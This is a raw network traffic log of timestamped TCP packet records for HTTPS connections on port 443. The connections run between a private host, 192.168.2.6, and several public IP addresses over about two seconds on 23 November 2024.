Nov 23, 2024 07:09:28.261624098 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.261706114 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.263784885 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.263880968 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.263890028 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.263938904 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.267576933 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.267646074 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.267653942 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.267704010 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.269649029 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.269654989 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.269737005 CET	49770	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:28.269892931 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.272010088 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.272100925 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.272109032 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.272165060 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.275947094 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.276057005 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.276065111 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.276113033 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.280778885 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.280864954 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.280872107 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.280922890 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.284554005 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.284651041 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.284657001 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.284699917 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.288486004 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.288677931 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.288685083 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.288938999 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.293416023 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.293490887 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.293498993 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.293560982 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.316605091 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.318039894 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.323102951 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:28.323153019 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:28.323218107 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:28.323920965 CET	49784	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:28.323934078 CET	443	49784	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:28.363321066 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.385993004 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.386024952 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.386080980 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.386095047 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.386116982 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.386199951 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.393734932 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.393757105 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.393800974 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.393809080 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.393834114 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.393865108 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.402178049 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.402195930 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.402236938 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.402244091 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.402283907 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.402293921 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.410722017 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.410739899 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.410800934 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.410809994 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.410845995 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.410891056 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.418288946 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.418304920 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.418387890 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.418397903 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.418647051 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.427525043 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.427540064 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.427598000 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.427608967 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.427690029 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.434972048 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.434988022 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.435080051 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.435091972 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.435132980 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.438741922 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.438801050 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.438807011 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.438831091 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.438875914 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.440834045 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.440921068 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.440937042 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.440973997 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.444282055 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.444365978 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.444374084 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.444423914 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.447969913 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.448066950 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.448074102 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.448129892 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.452749968 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.452847958 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.452855110 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.452902079 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.456311941 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.456414938 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.456423044 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.456470013 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.457530022 CET	49759	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.457549095 CET	443	49759	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.460028887 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.460088015 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.460094929 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.460258961 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.464749098 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.464847088 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.464854002 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.464894056 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.468373060 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.468461037 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.468468904 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.468508959 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.472194910 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.472310066 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.472317934 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.472440958 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.476824045 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.476888895 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.476896048 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.476952076 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.481035948 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.481101990 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.481108904 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.481159925 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.484668970 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.484843969 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.484849930 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.484937906 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.488409996 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.488490105 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.488497019 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.488552094 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.493118048 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.493201971 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.493208885 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.493419886 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.496779919 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.496856928 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.496864080 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.496967077 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.500433922 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.500536919 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.500544071 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.500595093 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.651530981 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.651619911 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.651629925 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.651674986 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.654541016 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.654618979 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.654627085 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.654828072 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.659209013 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.659269094 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.659276962 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.659327984 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.662882090 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.662945986 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.662955046 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.663018942 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.666426897 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.666493893 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.666502953 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.666559935 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.671084881 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.671155930 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.671164989 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.671206951 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.671216011 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.671233892 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.671264887 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.671264887 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.679250002 CET	49758	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.679275990 CET	443	49758	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.698451042 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.698476076 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.698483944 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.698493004 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.698513985 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.698525906 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:28.698549986 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.698565960 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:28.698594093 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:28.713709116 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.714015007 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.714446068 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.714452028 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.714683056 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.714689016 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.719145060 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.719203949 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:28.719212055 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.719228029 CET	443	49769	172.202.163.200	192.168.2.6
Nov 23, 2024 07:09:28.719273090 CET	49769	443	192.168.2.6	172.202.163.200
Nov 23, 2024 07:09:28.772690058 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.772747040 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.772861958 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.778680086 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.778692961 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.778702021 CET	49772	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.778707981 CET	443	49772	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.825081110 CET	49785	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.825118065 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.825229883 CET	49785	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.825484037 CET	49785	443	192.168.2.6	23.218.208.109
Nov 23, 2024 07:09:28.825509071 CET	443	49785	23.218.208.109	192.168.2.6
Nov 23, 2024 07:09:28.901562929 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.901592970 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:28.901722908 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.919292927 CET	49787	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:28.919317007 CET	443	49787	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.135238886 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.135307074 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.139851093 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.139858007 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.140219927 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.140223980 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.212308884 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.212332964 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.212349892 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.212392092 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.212405920 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.212419987 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.212446928 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.316421986 CET	49789	443	192.168.2.6	172.217.17.78
Nov 23, 2024 07:09:29.316478014 CET	443	49789	172.217.17.78	192.168.2.6
Nov 23, 2024 07:09:29.317363024 CET	49789	443	192.168.2.6	172.217.17.78
Nov 23, 2024 07:09:29.317641020 CET	49789	443	192.168.2.6	172.217.17.78
Nov 23, 2024 07:09:29.317656994 CET	443	49789	172.217.17.78	192.168.2.6
Nov 23, 2024 07:09:29.411062956 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.411088943 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.411134005 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.411145926 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.411179066 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.411199093 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.447140932 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.447179079 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.447206974 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.447215080 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.447259903 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.520139933 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:29.520201921 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:29.520490885 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:29.521471024 CET	49790	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:29.521488905 CET	443	49790	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:29.584145069 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.584177971 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.584224939 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.584237099 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.584269047 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.584299088 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.609298944 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.609323025 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.609374046 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.609392881 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.609426022 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.609432936 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.633917093 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.633940935 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.634006023 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.634016991 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.634047031 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.634068966 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.641232014 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.641261101 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.641295910 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.641328096 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.641335964 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.641351938 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.641410112 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.654697895 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.654717922 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.654767036 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.654779911 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.654808044 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.654824972 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.780031919 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.780100107 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.780098915 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.780133963 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.780160904 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.780179977 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.795113087 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.795141935 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.795172930 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.795186043 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.795209885 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.795243025 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.806319952 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.806390047 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.806529999 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.810184956 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.810209990 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.810245037 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.810251951 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.810281992 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.810302019 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.810513020 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.810548067 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.823232889 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.823255062 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.823318005 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.823324919 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.823358059 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.837281942 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.837307930 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.837347984 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.837362051 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.837388039 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.837412119 CET	49775	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.838247061 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.838272095 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.838330984 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.838337898 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.838377953 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.852370024 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.852391005 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.852427006 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.852435112 CET	443	49774	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.852466106 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.852484941 CET	49774	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:29.857793093 CET	443	49779	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.858333111 CET	49779	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:29.858341932 CET	443	49779	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.858822107 CET	49779	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:29.858827114 CET	443	49779	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:29.877113104 CET	443	49775	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:29.877139091 CET	443	49775	150.171.27.10	192.168.2.6
